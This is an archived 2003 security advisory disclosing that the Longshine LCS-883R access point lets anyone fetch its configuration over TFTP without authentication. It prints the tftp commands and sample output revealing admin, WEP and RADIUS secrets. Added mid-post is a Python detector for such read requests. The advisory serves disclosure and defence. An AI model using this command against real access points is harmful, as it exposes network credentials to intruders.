Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 10:52AM
Lukas Grunwald (lukas dnx de)
Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
Description: Get Superuser Privileges and view the device's password and other passwords
Versions affected: tested with 03.01.0b and 03.01.0h
Vendor contacted: e-mailed Longshine at Sun Dec 29
Details: You are able to connect via tftp to the access point and you can download the configuration
without authentication.
In this configuration the username of the superuser and the corresponding password are stored.
The WEP secret for the encryption and the password from your RADIUS server are also readable.
This "attack" works via WLAN (!!!) and Ethernet.
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
DNXLABLAN <- ssid
secu9 <- secret for WEP
You are also able to get the following files:
Solution: after contact with the vendor, he claims that a new firmware upgrade
fixes this problem, but the latest available firmware on his web page
doesn't fix it anyway.
LONGSHINE Technologie (Europe) GmbH
An der Strusbek 9
Tel: ++ 49 ( 0 ) 4102 / 4922- 0
Fax: ++ 49 ( 0 ) 4102 / 40109
support (at) longshine (dot) de
Lukas Grunwald aka REG lg1
DN-Systems Enterprise Internet Solutions GmbH
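A defender-side check for the request shown in the advisory, as an added example that is not part of the original post: it parses TFTP request payloads (RFC 1350 layout) and flags read requests for config.img sent to UDP port 69. The function names, the client address 192.168.108.77 and the sample datagrams are constructed for illustration.

```python
import struct

# TFTP opcodes from RFC 1350.
OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
# File name taken from the advisory; extend with other names your devices expose.
SENSITIVE_FILES = {"config.img"}

def parse_tftp_request(payload: bytes):
    """Return (opcode_name, filename, mode) for an RRQ/WRQ payload, else None."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (1, 2):
        return None
    parts = payload[2:].split(b"\x00")
    # A well-formed request has filename, mode, and a trailing empty part.
    if len(parts) < 3 or not parts[0] or not parts[1]:
        return None
    filename = parts[0].decode("ascii", errors="replace")
    mode = parts[1].decode("ascii", errors="replace").lower()
    return OPCODES[opcode], filename, mode

def flag_config_reads(datagrams):
    """datagrams: iterable of (src_ip, dst_ip, dst_port, udp_payload).
    Returns alerts for read requests that name a sensitive file."""
    alerts = []
    for src, dst, dport, payload in datagrams:
        if dport != 69:
            continue
        req = parse_tftp_request(payload)
        if req is None:
            continue
        op, filename, mode = req
        # Compare on the base name, case-insensitively, so "/CONFIG.IMG" also matches.
        base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if op == "RRQ" and base in SENSITIVE_FILES:
            alerts.append({"src": src, "dst": dst, "file": filename, "mode": mode})
    return alerts

# Constructed sample traffic (not captured from a real network).
SAMPLE = [
    ("192.168.108.77", "192.168.108.48", 69, b"\x00\x01config.img\x00octet\x00"),
    ("192.168.108.77", "192.168.108.48", 69, b"\x00\x01/CONFIG.IMG\x00netascii\x00"),
    ("192.168.108.77", "192.168.108.48", 69, b"\x00\x02firmware.bin\x00octet\x00"),
    ("192.168.108.77", "192.168.108.48", 53, b"\x00\x01config.img\x00octet\x00"),
    ("192.168.108.77", "192.168.108.48", 69, b"\x00\x01config.img"),  # truncated
]

if __name__ == "__main__":
    for alert in flag_config_reads(SAMPLE):
        print(alert)
```

Since the advisory notes the download works over both WLAN and Ethernet, the check needs to see traffic from both segments to be useful.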
Re: Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 06:57PM
heydowns borg com
Copyright 2010, SecurityFocus